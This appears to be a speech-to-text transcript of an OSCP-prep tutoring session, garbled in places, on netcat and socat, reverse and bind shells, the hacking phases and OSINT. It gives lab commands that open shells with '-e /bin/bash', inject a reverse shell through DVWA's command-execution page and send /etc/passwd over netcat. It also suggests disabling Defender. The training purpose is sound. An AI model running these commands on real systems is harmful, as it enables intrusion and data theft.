yeah, so I guess this could work. Yeah, it worked. So what I can do is I could go for simply updating it. Hardly it's gonna take a little time. It's all about like how your repos are there and how you can actually use your repository. Okay, so let me remove this one, and then I need to go for app update. So I can go for app update and ouch. The repository non. Okay, so they have also given the solution for this one. Let's see. Ouch. Okay,
Reject.
now let's update. Okay, I guess there are some station issues, so I need to check it out. What's wrong with it? But let's continue with the part, or I guess they might have told something. Public, yeah. So let's check out from the Kali's forum. So the best way is if you got ever struck when I run, I get yes. So yes, here it is. The copy, paste it, and then we have got this one for adding it. Okay, so you could use these two commands I will give you, like for updating. We have got many utility tools which can be useful for us, and they are like Netcat, they are like SoCat, Wireshark, and apart from Wireshark, we have got the counterparts of Wireshark as in T-Shark, okay, and TCP dump. Some utility
Okay.
tools also includes your PowerShell and PowerPoint or PowerView.
Okay. Okay.
Okay, so these are .ps ones only. So these are some utility tools. Yes, there is this one more PowerCat.
Okay.
So why these utility tools? Let me be clear about these things. When we talk about the utility tools, they are just like simple tools but can be used for multiple things. Let's say in OSCP, if we are talking about the OSCP's exam,
Mhm.
our we can only use uh, we can only use only a Metasploit framework only for one machine. Though we could use Metasploit frameworks modules, like different modules for n number of machines. But
Okay.
here, when we are talking about the Metasploit framework, we can use only one for just for one machine, not more than that. So in that case, we require tools like Netcat and SoCat. So what they are good is, they are good for using. Like you could go for okay, Netcat and SoCat. They are okay. When we talk about simply Netcat, it's a army Swiss knife tool. Okay, why we call it as an army Swiss knife tool? Because of the reason firewall. That's a very
Your
advanced function.
your voice broke in between.
Okay, there might be issue in internet connectivity today. I don't know why. The
Okay.
routers at my room is not working that much good, but I'll try to copy it up with it. So hopefully it won't break. See, I'm connected with STS. We can go for firewall testing. Though firewall testing is quite a bit advanced here, though we won't be going with it. The basic of them is TCP IP connection. Okay, TCP IP connection as in your netcat is the best tool for creating small TCP IP one-to-one P2P connection. It can be used for transferring files. It can be used for transferring different files. It can be used for a remote connection. It can be used as a scanner as well. Okay. So these are the basic functionalities which can be used for using our netcat. Okay, so same thing can be done with the SOCAT. Same functionalities can be used with the SOCAT as well. Okay. Now, when we talk about the netcat, so what usually happens is we can create a payload from MSF payload or from Metasploit framework. We can create a payload, and after creating a payload, we can use our netcat for listening on a reverse connection, or moreover, we can perform a bind connection with the help of our netcat. Depending upon the usability of the netcat or usability of the payload or the creation of the payload, we could create different kind of connections with it. So when we talk about these two tools, netcat, socat, or even your powercat, there are two things. First one is an initiator, which means from where the connection originates. Okay, which means the machine from which the request will start, or request will originate. Then we have got a listener, which means the machine which will be listening on a specific socket. Now, the very best thing about the listener or any kind of connection over here is it is supposed to start at the on priority basis. Like it is supposed to be start first. Okay, while we are performing the things, we need to start our listener first on either of the devices. So netcat and socket can be used for both Windows as well as Linux or Unix based operating system. Now, first functionality is to create a TCP IP based connection. Okay, so what I will do is I'll use two machines here. So first one is my Kali Linux and second one is Metasploitable 2. So let me write down the IP address of my Kali Linux. I have already turned on prior to the session today. I'll also require my Metasploit's IP address. So my Metasploitable's IP address is 192.168.181.130. So 192.168.181.130. What it will be 192.168.181 dot 134. Okay. So that's my IP address. What I can do is I can create a listener. So the very first thing is to create a simple TCP IP based connection. In any functionality, if there is a listener and as well as an initiator, I need to start my listener first. Okay. For listener, that's my Kali Linux. So I will that's my Metasploitable. I'll go with the command nc space hyphen nlvp and you need to specify a port, let's say 1337. Now, what does these variable means? Hyphen n means no lookups or no DNS lookups, which means all numerical data. Okay. Then hyphen L means it is on listening mode. Okay, it is on listening mode. Hyphen V means verbose, and hyphen P means to listen on port number. Okay, rather than to listen, I could specify to use up to use port number. Okay, and that port number will be a specified port. Okay, specified port. So it will be taking, and we need to leave it there. So let me start my listener first. So let's say NC space hyphen NLBP over port 1337. It says listening on any communication coming over this port, that is 1337. Now
You
we
started
need to start
Metasploit?
Metasploitable, sir.
Okay.
That's another vulnerable operating system, just like the online system.
Okay.
It's a Linux based system, so it fulfills all of my conditions.
Okay.
Okay. Then next thing is we need to start an initiator. Okay. For initiator, let's say for initiator, I'll be using my Kali Linux, that is from where the connection will be originating. So I will go with NC space hyphen NV over my target IP address or listener IP address and the port number. What's wrong with this? Just a sec, sir. File chapter 4 dot
You are following the
SQL.
OSCP book, or when you are mentioning chapter 4, what is it?
It's yes, sir. It's the OSCP's chapters.
Okay. Okay. That's all I want to know. Okay.
Right? So it will be like NC space hyphen. It usually helps me in keeping the references.
Yeah.
192.168.181.131, I guess its IP address is 130. Sorry, 130 over port 1337. So here for listeners, we will be having the syntax as in NC space hyphen NLVP, and you need to specify the port number. Okay. So here our again hyphen N means the same thing, that is no DNS resolution. Sorry, do not resolve DNS, by the way. It is do not resolve IP slash DNS, which means all numerical data. And hyphen V means your verbose. Okay. Then with the listener IP address, you need to specify the IP address of the listening machine, and there is this port number. and from that port number I need to specify the uh, port on which the listener is listening. Okay. So that's how you will be able to make a connection. So let's go or jump into our Kali Linux. I will specify here NC space hyphen NV 192, sorry, NC space hyphen NV 192.168.181.130 over port 1337. It says unknown over port 1337 open. On the other hand, you will be able to see connect to this IP address from that other IP addresses. So it means now we are connected. Okay? It means now we are connected here.
Okay.
Okay. Now for a conversation to communicate here, what I will do is I can just communicate it. Let's say, hello, Mr. Kali, how are you? On over Kali Linux, if you will be seeing, you will be having the same message and you can communicate. Let's say, hello Meta. Uh, I am fine. Thank you for asking. I hope you still are exploitable. Okay, and over here you will be able to see the communication is going on.
Okay.
Okay, so that's simplest TCP/IP communication which can be created over your this one matters over your using your netcat. Then we could use our netcat for transferring a file. Okay, you could use your netcat for transferring a file. Let's say again, you need to start with the listener first, and the listener says simply NC space hyphen NLVP over port 1337 and redirect the data inside a file. Let's say you are receiving any file, so you can just give it the name. Let's say uh, file dot txt. Okay, and on the other side we have got the initiator. Initiator will go NC space hyphen NV over the IP address that is 192.168.131 dot your another one uh, sorry 181.130 over port 1337 and there you need to use again redirect from a file to the command and give a file name here. Okay, so for that I guess we need to create a file. Let me terminate the previous connection. ls downloads. Okay, I don't have any file, I guess. So let's create a file. Nano. Okay, I can just copy a file, so it will be pretty much easy. CP slash etc slash password file to a file here. Sorry, at this location ls. So we have got this file mv password file into user underscore data dot txt file. Okay, if we go for listing, we have got this file user data.txt. So we are having this specific file. So what I can do is I could initiate simply netcat space hyphen nlvp over port 1337 transferring the data. Let's say kali underscore path dot txt. So it will automatically send the data to this specific file when it is transferring from a initiator to this system. Here, I will be specifying the information here in the same manner. Uh, It will be simply NC space hyphen NV over this thing, redirection. and I will be using the file user data.txt. It says communication is open and communication here is open. So hardly it's gonna take few seconds. You can close the connection from one system. It will be terminated on both the system. Listed. Can you see we have got Kali underscore pass.txt. If we go for opening or checking out, you'll be able to see all the information. Got it?
Yes. Yes.
So that's how you will be sending the file here from your normal system to, sorry, from one system to another system here. Apart from it, when we are talking about in the another manner, let's say if I want to transfer from Kali this Metasploitable to Kali Linux, I will use the same but in a reverse order, which means in Kali Linux I will be redirecting into a file, and in Metasploitable I will be redirecting from a file to the command itself. Got it, sir?
Mm-hmm.
Perfect. Now, after doing this thing, I can go for a remote administration with Netcat, which means I can directly create some kind of shell here and I could directly execute those shells from the target system to a network system, and I could take the access of those specific shells. So, okay, let me start one more thing just for the purpose. Just a second. What? Those. But they don't have Windows as of now. Okay, anyways, okay. So again, this time I will be going for a remote administration, which means first thing I will be doing is creating a bind connection. Okay, when we talk about the bind connection, what usually happens here is the target system is already listening on a port. The attacker will send some commands or send some packets to connect with the target system and gain the shell. Okay, so that's what we call the bind connection. So here we are having attacker. Attacker will send a connection to your target, and attacker will have the shell over here. Okay, so I am the attacker, my neighbor is my target, so I will be sending a connection over his IP address, and there I will be having a shell in my system. That's what we call bind connection. The opposite to it is reverse connection. Okay, the opposite to this one is reverse connection. When we talk about the reverse connection, here the things are pretty much opposite. The target will be sending the connection to the attacker. Here, the attacker will be listening on a port, and after the connection is received, the attacker will launch a shell. Okay, so in simple terms, let's say we have got an attacker here. A connection will be initiated from our target system. So again, attacker will be able to deploy a shell over the system. Okay, so there are two conditions. So first one is your bind connection, when an attacker will be sending direct connection to the target and will be able to listen. Then second, we have got a reverse connection in which your target will be sending a reverse connection back to the attacker. In both the scenarios, attacker will be having the shell. So when we talk about the bind connection, let's say our Metasploitable is using the bind connection. So which means it will be a listener here. Okay, it will be a listener here, and I will use NC space hyphen NVLP over port 1337, and they need to execute slash bin slash bash. Okay, so hyphen E means to execute the command. Okay, and the command here is to execute bin bash. So let me start our Metasploitable reverse connection, listening one. ANSI space hyphen NLVP over port 1337 hyphen E to execute slash bin slash bash. Hit enter and it has started listening. Now attacker's time will come. Okay, attacker's time has come for generating or for initiating a connection there. So what attacker will be doing is attacker will be directly sending the command, let's say NC space hyphen NV over the IP address 192.168.181.130 over port 1337. A simple connection it will be making.
Okay.
So let's go for it and see. And I won't be needing this other stuff. Hit enter. Can you see? It's a non-interactive shell.
Mm.
Okay. I can just type bash here. It will give me this thing, or if I want to spawn it, I will go for Python space hyphen C import pty dot spawn, and what we will be spawning is slash bin slash bash, and we are into it. Let's say, who am I? It will tell you we are MSF admin. I could check out the ID. I could check out the host name. It will give us the information. So here I am able to execute the command. So I could make it as a kind of C2C server, that is command and control server. If I will check the IF config, you will get the information about 130's IP address, which is my Metasploitables. Okay, so that's what we call a remote connection, or simply a bind connection. On the contrary, when we talk about our reverse connection, see, whether it be a bind connection or whether it be a reverse connection, so here attacker will be listening. Sorry, the
Okay.
listener will be started at the very first. So let's say what I'm going to do is this time attacker will be listening. So let me attacker NC space hyphen NVLP over port 1337 and execute slash bin slash bash. Sorry, I will be just listening over here. Okay, I will be just listening. So let's say uh, on the listener side, sorry, on the attacker side, it will be listening. So this time your attacker will be uh, listener here. Okay, your target will be initiating the connection. Okay, so let's start our listener first. So let's say NC space hyphen NVLP over port 1337. Now, on the initiator side, that is on the target side, they will execute the command NC space hyphen NV over 192.168.181.134 over port 1337, and on connection execute slash bin slash bash. So here it will be directly initiating the connection, and on connection it will be sending or it will be starting a win bash connection. So let's say over my Metasploitable, I will go for NC space hyphen NV over 192.168.181.134 over port 1337 and execute slash bin slash bash here. Hit enter. It says connected. And if we will go to our Kali Linux and type here ls again, we are into the same system. Okay. So that's the two connections, the remote administrative connection. That is first one is your uh, bind connection, and second one is your reverse connection. Got it, sir? Okay. That's your netcat. That's how you will be using our netcat. Then on the same time, we will be having another tool named as SOCAT. Okay. SOCAT. Okay. By the way, you can use both of these tools over both your systems, your Linux as well as your Microsoft operating system. Let's say download netcat for Windows. Okay, so you can download netcat here from for Windows, but again the problem is if you will be downloading netcat for Windows, you need to turn your anti malware systems off.
Okay,
For
or else I need to download Metasploit.
come again, sir.
Or else I have to download Metasploit, right?
Yes, in general, I am talking. If you will be, let's say, if you are going for pen testing or any kind of red teaming stuff, and you
Okay.
have one Windows system and you want to use it rather than using your Linux system, so in that case, you need to turn off your real time protection
Okay.
services. Okay, because it consider it as a remote administrative tool, so it will block the connection. Then we have got SOCAT. SOCAT is again another tool just like netcat. Okay, it also has
So do I need to
listener.
use Metasploitable 2 or Metasploitable? What should I download?
Metasploitable too, sir,
Okay.
and initiator. Let me send you the link for Metasploitable too as well. Copy. So I preferly use Metasploitable because of the reason it is lightweighted.
Okay.
As you could use any other operating system which have a Linux inside it, or uh, any Microsoft operating system it have. So I usually prefer Metasploitable. It is lightweighted and though doesn't consume much of the resources.
Okay.
Okay. We can again use Metasploit this thing for creating a TCP IP based connection. This TCP IP based connection can be stated here as well. Again, remember this thing. We need to first start a listener. Okay, listener is the very first thing we will be starting. Either we are using our Meta, this thing netcat, or our Snowcat. So let's say if I want to start a listener, I will go for Snowcat space TCP4 hyphen listen over a port. Okay, over a port, and then you need to specify standard out. Okay, so that's the simplest of the this one the command. Let's say socat space uh, TCP4 hyphen listen over port. Let's say 8080. I will be using standard output. So I'll be using my Metasploitable as the listener here. I will go for socat space TCP4 hyphen LISTEN 8080 STD out. Okay, hit enter. So it has started listening. But on the initiator side, that is, if our initiator is there, that's our Kali Linux. I want to connect, so I will go for showcat space hyphen space TCP 4 colon TCP 4 colon. You need to give the listener IP address. Then with a colon, you need to specify listener port number here. Okay, it goes in this of the simplest manner. That is, I will be sharing or I will be using it here. So in simple terms, if I want to execute, I
Both
will
these
go for
tools
show.
will be used once we get a basic connection to that, the system, right?
No, these tools are used for getting the basic connection or even the advanced connection in the target system.
Okay, so for example, I want to hack one system which is A dot B dot C dot D IP address, and how do I make it the initiator, or how do I make it a listener?
Okay, okay. In that case, let's say you will get on the upfront you will be getting a web application, and web
Okay,
application might be having some sort of vulnerability. So what
yes,
you will do is you will try to convert that vulnerability among one of those vulnerability which can give you either the accurate admin access of the web application or could execute a command.
okay,
Okay, and from there what you will do is if it is converted into a command execution, so you will be able to get the shell.
yeah, that's
Okay,
what.
let's
Until
say
until we get access to that system, these tools may not be useful because I have to run commands on both the listener as well as the initiator, right?
no, let me show you this thing, so it will be easy in that manner. So let's say I've got a DVWA, so I just know the IP address, there is nothing running over that target system, and there is a simple web application running. So just a sec. 19 192.168.181.130 slash DVWA. Okay. There is this, let's say, command execution is there. So what I can directly do is I will be checking. I am not aware about the vulnerability which is there, so I'll be keep on testing and checking. And I say, let's say, I've got this thing 127.0.0.15 uh, uname hyphen a. From here, I will be able to get to know it's using a Linux based server. So I can directly use this command or this vulnerability, let's say nc space hyphen uh, nv over my IP address 192.168.181.134 over port. I could specify it uh, 1234, and upon execution it should give slash bin slash bash. So I am making it as an initiator, whereas on the other hand I'll use my Kali Linux, let's say nc space hyphen nlvp over port 1234. So it will be listening for the connection and I will be executing, let's say submit it, and let's see whether I get a connection or not. Can you see it is connected?
Mhm. What if the listening is not there? It's not turned on.
If listening is not there, so let's say I'm just not listening over any of the services, if I will be executing the same thing here, so it won't be executing at all, so it will say and it will vanish after this time.
Mhm.
Okay,
Yeah. So
so
in
it's
that case, we cannot establish a connection, right?
in that case we cannot establish a connection, so it means attacker system is always with us. So if it cannot be an initiator, it could become any kind of listener. Okay,
Yes.
so let's say I could become a listener always, and the we don't have the access of the target system. So what we can do is, what we have the access of the web application which is running on the target system, and
Yes.
from that system we try to initiate a, reverse connection on our system, like
Okay.
this.
Yeah.
Or
Got it.
even let's say, if I want to make it a listener, I haven't tried this thing so far, so we can try it. I can make it an LVP over port 1337 and execute slash bin slash bash. Okay, so I will make it in this manner, and I could try to go for nc space hyphen nv 192 over port 1234. Okay. So I can again have the access of the target system. It will be there unless I don't disconnect that connection from here. So
Okay.
it can be used in this manner. So both your netcat and socat can be used as an administrator tool or administrative tools here.
Okay.
So it's already listening over port 8080. Oh, that's our standard output. And yes, we could use this one. So let's say I can connect it. Socat hyphen TCP4 over the IP address 192.168.131.130 colon 8080 and hit enter. You do hello, and it will be giving you the same kind of, okay. Mm-hmm. 8080. So cat hyphen TCP 134. The Metasploitable's IP address is 130. Yeah, it should work. Metason socket TCP4 listen 8080 STD out. Socket TCP4 port IP address and the port number 8080. Okay.
Yeah, we got that.
No, that's something I typed in
Yeah.
here. It says connection is refusing due to some reason. Okay, sorry. It's 181. Okay, hi, hello. So it will be there now. So sorry, my IP address was wrong.
Okay.
How are you? Okay, so it will be working in this manner. Again, you could use your SOCAT for transferring the files. Mm. Again, you need to create a listener there. And for listener, so here what the thing is, it will be sending a file from the listener's system. Okay? It will be sending a file from the listener's system to the target system. So first here again we need to create a listener here. So I will go for the same command. Let's say socat space TCP hyphen 4 listener and listen over port. Let's say 1212. Then with a comma I will specify fork. Fork means to initiate a new process. What kind of process? A file process. And we can share a file, let's say, uh, Kali underscore pass dot txt file Okay, so I will go in this manner. So it will automatically start and create the file system over there, or it will start transmitting the file. So let's say so cat over your port 1234, for example. I will be starting fork about a file, and the file will be I need to check out the file name. Kali underscore pass. Fork, comma, fork, file, and the file a colon, Kali underscore pass dot txt. So it will be sending over port 1334, it will 1234, it will be listening. But on the other side, that's on the initiator side. Okay. Uh, so I can say here the listener, this side is known as the sender, and initiator is the receiver here. Okay. So here what I will be doing is I will be specifying socat. I need to specify my target IP address. So let's say TCP4 colon 192.168.181.130. That's my Metasploitable IP address 1234. Sorry, or I could go for 1212. Then I need to specify some file operation, and I could specify uh, recvd dot txt. Okay, I'm saying the data is supposed to be received in this file. If file is not there, then create the file. Okay? If file is not there, then create the file here. So let me go ahead. So cat TCP4 colon 192.168.181.130 colon 1234 is file. It's in file operation, and I am saying recvd dot txt. If file is not there, then create the file. If you will do a simple ls, can you see received file received dot txt? I
Mm-hmm.
can go for cat received dot txt, and the data is completely transmitted here.
Okay.
Got it?
Yeah, yeah.
Okay, that's perfectly fine. Okay, so same way you could initiate for the connection. So socket, I am not sure that socket is available on Windows. Download socket for yeah, socat is there for Windows. So you could use that specific tool, that is your socket.rar, which can be used for socket cat. Okay, so you
Okay.
can download the files from here, the socket for Windows here, or even if you don't want to use that one, there is another repository, TAC 128 socket something something, or you could use from the source code. Any source you could use here, so it's giving you the exe file. So better, I would recommend you to go for this specific one. So you could download socket for Windows. Again, the same thing. If you will be downloading socket for your Windows operating system, you need to turn your Defender off.
Okay.
Okay? You need to turn your Defender off here. Okay, so these are two basic utility tools, but most of the time, like 80 to 85% of the time, we will be using our Netcat.
Okay.
Okay, most of the time we will be using our netcat for getting the connection because of its reliability. Reliability as in it's pretty much more reliable and stable as compared to our PowerCat or our this one SnowCat. So that's why we will be using most of the time our netcat for generating or for grabbing the access of the system. So I'll stop here for these two tools. Tomorrow we'll be completing
Yes.
Wireshark. In the next session,
Okay.
I'll completing the Wireshark, and I have got the labs for Wireshark as well. So let me share this file with you. Okay, it is the very first phase. But before we move towards our information gathering, let me tell you about five phases of hacking. Okay, the very first phase is our reconnaissance or information gathering itself. Recon also called information gathering. Then second one is scanning. Third one is gaining access. Fourth one is maintaining access, maintaining access, and the fifth one is covering traces. Okay, that's the five phases of hacking, which means when a attacker or when an adversary is trying to exploit a device or trying to exploit even the infrastructure and organization, he or she needs to go through all these five phases. That's the ideological method. Okay, wherein reconnaissance will try to gather the information about the target, and scanning we will be कोई नहीं उसको कोई हॉट कॉफी दे दे So scanning means to scan about the information, like doing a port scanning, version scanning, and operating system scanning. Then, depending upon the information gathered, the attacker will be performing an exploitation, which will be gaining the access of the system, which will come under gaining access. Then he or she, the attacker, needs to maintain the access, so he'll be maintaining the access. And after that, they need to remove the traces of their presence. It's known as covering traces. So these are five ideological phases which a attacker follows or which is being followed by every attacker. But in reality, it is not possible to have just five phases. So it was the internet community or the security community which divided the whole phases into three phases. First one is pre-exploitation phase. Okay. First one is pre-exploitation phase. Second one is exploitation phase, and the third one is post exploitation phase. Okay, when we talk about these phases, so here in pre exploitation, it is just like before exploitation, which means it will be all about information gathering, also called reconnaissance, plus scanning, plus enumeration. Okay, your pre-exploitation phase is all about this thing. Then when we talk about the exploitation phase, it means exploiting vulnerabilities and gaining access. Gaining access means gaining access of the system of the target. Then we have got the post exploitation phase, which means like uh, privilege escalations. Then it could be including some pivoting. Plus, it could also go for some kind of lateral movements. So these are the things which we include in our post exploitation phase. So depending upon the scenarios, we
I know
need to.
privilege escalation, but what is pivoting? Lateral movement also have idea, but pivoting is a
Okay,
new term for me.
pivoting means let's say you reach into a target. Now there are 10 devices in the computer, in the network or in the infrastructure. So from one
Mhm.
device to moving to another device and conducting the whole attack, which means you are keeping your source completely hidden and you are
That
using
is also
someone
called as
else.
lateral movements, right?
Yes, pivoting is a concept of lateral movement. But in lateral movement, we go for some other things as well. Like we go for port forwarding and SSH tunneling. We go for some kind of DNS tunneling and to
Okay.
getting someone's access. Let's say some credentials. Let's say you gain the access of an end device in the Active Directory. So what you will do is you will try to perform some Kerberos roasting or password spray method that will come under lateral movements.
Okay.
Okay, so that's why I keep it pivoting as a different concept and your lateral movement as different concept here.
So
So though it
pivoting
is
is
true,
nothing but trying to, access other devices, right, in the same network.
yes, yes, it's just like we both are standing here and you want to shoot someone who is standing right in front of you. There are two ways. Either you can hold the gun up and shoot the person. That's one way. Second way is you could use my shoulder for the support and shoot the gun. In either case, you will be the one who will be shooting the gun. But in both the cases, that is in the first case, directly shooting, they will get to know that you are the person who shoot. But if you will use my shoulder as a support, they will feel like, okay, I have shoot the gun and you were just standing right behind me.
Okay.
So that's the concept of pivoting. So from the infrastructure, we will try to gain access, and after gaining the access, we will be compromising some other devices so that we could conduct our attack. Because most of the time, an attacker wants to become an APT, that is advanced persistent threat, which means to remain hidden for longest amount of time period and get undetected by the blue team. So that's the major concept of pivoting. So they want to remain undetected so that none of the antivirus or IPS IDS firewall or even the SIM-based tools could be able to monitor their events and fetch or throw them out of the network. So that's the major concept why we usually go for pivoting. We don't want our main source of the access to get breached or to get escalated or elevated out of the system itself. Hello.
Yeah, I can hear you.
Yeah. Okay, so when we talk about information gathering, okay, that was the concept of your five phases of text. But there is one more concept known as Lockheed, Martin, cyber kill chain. Okay, that's the ideological methodology for performing a red teaming. Here again, first is again a recon, then we have got a weapon weaponization, then we have got a delivery, we have got the exploit, then we have got the installation, we have got the sixth phase as command and control, which is also known as C2 servers. Then at the end, we have got this thing known as your exfiltration, okay, which means job or objectives, work of objectives. So we will be looking according to this one, Martin Lockheed Cyber Hill Chain method, because that's something you can use everywhere, whether you're doing a red teaming or whether you're doing a pen testing. Got it, sir?
Okay. Yes.
Now, when we talk about information gathering, it says the more information you have on target, more ways to exploit. Okay, and another thing says the information more narrow and focus your attack will be. Focus your attack will be. Okay, so that's why it is pretty much important for us to understand the target. It is pretty much important for us to know about the target, because it will help you create an attack vector. It will help you in creating, or so called in making, simple, in a very simplest thing, a simple weaponization. Okay, weaponization means to create an attack vector, okay, as a weapon. Okay, sometimes it could be a payload, sometimes it could be a malicious PDF file, sometimes it could be a malicious PHP file, sometimes it could be a simple doc file or macro file, uh, sometimes it could be a simple PPT file, or sometimes it could be an Excel file, depending upon what kind of information you are gathering. So that's why it is pretty much important for us. And we talk about this term information gathering, there are two types of information gathering. Okay. Sir, by the way, today's session will be a little short,
No
if
worries.
that's
No worries.
fine by you, because
Yeah, yeah, totally fine.
yeah, okay, that thank you, sir. So there are two types of information gathering. First one is your active information gathering, and the second one is known as passive information gathering. So when we talk about these active information gathering, here we will be going for direct interaction with the target. So let's say I am your target. So what you will do is you will directly come to me and start communicating with me. Hi Avi, how are you? I hope you are fine. How's your wife? So I didn't got the age of your wife. So how are your both the children? Sir, I don't have both the children. I have got three children. One is daughter and two are son. Then okay, I was calling at your contact number, which was XY. No, sir, your contact, you have got a very bad contact number. So my contact number is eight XY something. So you will be trying to manipulate me, make sure that you have the right information out of it. So that's what we call direct information gathering, like directly interacting with the target. Now, passive information gathering means you will be gathering information about me from other sources. Let's say you will be using some internet or you will be using some Google searches. You will be directly approaching my friends rather than approaching me. So here in passive information gathering, rather than directly interacting with me, you will be interacting with the open source information which is provided over the internet. Okay. So
Yeah.
due to this nature of it, we called it OSINT. Okay. OSINT means open source intelligence. Okay. OSINT means open source intelligence. So due to this nature of it, like gathering information from the open source of not directly interacting with the target, we called it OSINT, that is open source intelligence. But before we move further, we need to keep few things in mind about information gathering. And those few things are like it is for yourself. It is for the attacker itself. Okay. Second thing is you are not going to share that in the report unless required. Okay. So the information you gathered, unless it is required or it is critical, you are not going to share it with someone else. Then third thing is when we talk about this information gathering, you need to make notes of your own in your own way. Okay. So in simple terms, this information gathering is for you and your understanding, which means it's for just for the attackers and attackers understanding. You don't need to share this information with anyone else. Then what you need to do is you need to create notes of your own. Doesn't matter how you keep it. Even if you note down the information on a piece of paper or create an Excel sheet, create a document sheet, create a document or create a mind map out of it. So it is just for you and your understanding because you or the attacker will be creating an attack out of it. So he needs to understand the whole architecture and the whole information. So it is not required by the organizations to submit the report for the reconnaissance, nor even in the red teaming. So VAPT is a far more different concept as compared to rating. But even in VAPT, no one asks you to give a report of just information gathering. They will be asking or they will be concerned with the vulnerabilities. Doesn't matter how you are able to fetch those vulnerabilities or perform a vulnerability chaining. They will be majorly concerned with the exploitation and the part of mitigation, how you can exploit it and how you can mitigate those vulnerabilities from their from the target itself. Okay, so when we talk about, we are talking about the targets, or we are using the word targets. So there could be two different targets. First one is like three different like targets. Could be a simple your online or a hosting site target, like a human and a non-human target, or a tech target. Okay. Now, when we talk about the tech target, we could feel two things over here. First one could be a web application as a target, and the second thing you could put inside it is simply your network as a target. Okay, so depending upon what sort of information you are looking into or you are seeing for, your information gathering target will be categorized into two different things, like a human or a tech target. In tech, like tech is something which is the word which I gave. There is no such word like there is a tech target. It's a word which I usually use while training. Like it could be a human or it could be a non-human target. Then in other targets, like in a human target, you could always specify, like it could be a actual employee, or the head of the organization, or you could say it's an organization itself. Okay, let me specify it here. Either it could be a human or it could be an organization itself, depending upon what's the scope. So very first thing we need to check here is the scope for the testing. The scope for the testing, which means they will be defining in the test regardlessly. Okay, by the way, sir, according to, I won't be teaching you information gathering according to the OSCPs because it is restricted and limited. I will be giving you information gathering according to my ways and the methodologies of red team. Will that be fine?
Yeah, that's fine.
Because in OSCPs, the information gathering is very, very, very limited.
Okay.
Okay, they
The
will be
reason
telling
why,
you.
because they have already given us the IP address.
No, the thing is they have given according just to the OSCP and the pen testing perspective.
Okay.
Okay, they have told what an OSINT is. Let me show you. Yes, I might be having that book, PWK. So if we will be navigating through the OSCP's content for information gathering, the page number is 134. Okay. So they will tell you first about information gathering, like how you can take notes and website recon. They will be telling you only very few out of these stuff, like who is a reconnaissance, and then Google hacking databases. Then they will give you introduction about some Shodan searches. Okay, like again from exploit DB. So you will be having a very limited and restricted area for performing the reconnaissance. I am not saying that their information gathering is bad. No, it is pretty much specific for the OSCP's target. But what I usually go for information gathering is a complete guide from A to Z, what information you can grab and how you can grab actually. So
Okay.
which includes the methods which are not taught in the OSCP's course.
Yeah, that's fine.
Perfect. Okay. Now, when we talk about the scope of the target will be telling you all the required information to start with. Okay, they will be telling you whether it is a domain. Okay, in domains, they will be telling you whether there are subdomains or simply the host site. Okay, is there any kind of server included, which could be your mail server, which could be your database server, which could be your name server, or even a load balancer? They will also tell you and specify you if there is a like, if they haven't specified, they will also check ask you to go for like third party integration testing. Okay, so like this all kind of information they will be telling you in the scope. So I guess you are pretty much far experienced than me, so I guess you already might be knowing this thing, that while doing pen testing or while performing some kind of assessment, we need to stick towards the scope. So you don't need to go extra from the scope, you don't need to go less than to the scope, you just need to exactly stick towards the scope. because you are being paid just for the scope, not less, not more. So you need to stick towards it. Now, when we talk about a target, okay, when we actually talk about a target, okay, let's say we'll take a couple of targets. So for the starters, we'll go for mega corp one.com. Okay, let's assume this is our target. So, what kind of information, sir, you can gather about this web application or anything? Let's say, if in general, I am asking you, sir,
The
there is
first
this
one is IP
target,
address,
okay, IP
then
address,
IP address. Then based on that IP address, we can find their IP address mask, like what would be the range of the IP addresses. Then
address mask slash subnet. Let me
yes,
specify.
subnet mask. Yes. The other one is maybe the technology in which this domain, this website has been developed. If there are any
Technology
subdomains,
for develop. Okay, if there is any
subdomains.
domains,
Then if there is any admin URL for that website.
okay, admin URL. That's going good going.
Then the other one is, yeah, existing vulnerabilities on the website. Like for example, if they have um, any of the JavaScript that can be exploitable, or any technology that we see can be exploitable, then we can look into that.
Perfect.
Like
Exactly.
SQL
Okay.
injection, all that. When I say vulnerabilities, it can be a SQL injection, it can be a file upload injection, or what any.
Any vulnerability could become. So,
Yes.
what I want you to do is take XYZ any target, regardless of what I have
Mhm.
given. Let's say you have your rival company, take it as a target. I don't want you to do anything technical, but I want you to sit down for a while,
Mhm.
open a notepad, and start writing what information can you gather and how you can gather. Can you do
Yeah,
it?
we can also, yes, we can also go to LinkedIn, get all that employees' email addresses, means whatnot. Like there are many social engineering, social media websites or anything. Like it can be Twitter, LinkedIn. I can get employees' email addresses, then start spamming them. If you really want, there are so many ways. I can do social engineering attacks on the information that I can find on.
That's perfect. Since we are doing the OSCP, there is nothing we need to be stopped. So we don't need
Mhm.
not to be stick in the box. So we can go always out of the box in OSCP.
Yeah.
So that's fine. So I guess in the last session you got to know how IPs can be collected and how we can actually use them.
Hmm.
Okay. So like how reconnaissance is getting the main access and going for such kind of information will give you access. Now, okay, it turn the Metasploitable to as well, sir.
Yeah, yeah,
Okay, you need to click in the screen to see it's working or not. It
yeah, yeah.
usually turns the screen off.
I clicked on it.
Click it down and use some space bar or some key combination. It will check it out. Yeah, it's okay. So we already have the IP address. Okay, let's go for couple of more IP addresses from this thing, from our try hackney.
Okay. What do you want me to get?
A couple of IP. Okay, let's go for try hackney, and there will be a machine named as Blue, so we could use their
Okay.
search for the machine named as Blue. Yeah,
This one?
yes, sir. Join the room.
Mm,
At the right bottom corner, there is this button join room.
okay. Okay.
and you will be seeing an okay. Scroll little down to join the you join the room. So we need to start up the machine. So here it will be showing you little down in the task one or task two.
Yes.
Yeah, here it is.
Start
Start
machine.
machine. Yes, sir. Okay. Now grab the VPN. Meanwhile, it is checking the IP address. We need to have the VPN so that we could connect it within the system. So on the right hand side on the top, can you see the icon, the robot icon, the blue
Mm-hmm.
color robot?
Yeah.
Click on it and use your control key to click on access. Like press the control key and click on access. You can open it in the new tab. Open the access there from the drop down menu in the new tab. The access, yes, sir. Access, yes, in the new tab. Okay, yes. So from here you need to grab your VPN. Scroll down a little, little. Yeah, here it is. Download configuration file.
Okay.
You need to grab that file inside your Kali Linux and use OpenVPN to open it. So you will be connected inside the system here.
Out. 1 minute.
Click on that dialog option. Yes, it's for the starters. It's the browser escape. It's always allowed. Done. Yeah, VPN file has been downloaded. Now use that VPN, copy that VPN file in your Kali Linux.
You want me to paste it here?
Yes, sir.
Yeah.
Okay. Now go to the screen 4 or screen 3 because we don't want this file to get interrupted. Open the terminal here and use your super user, root user.
Okay. Oh, sorry.
Sudo space su
Okay.
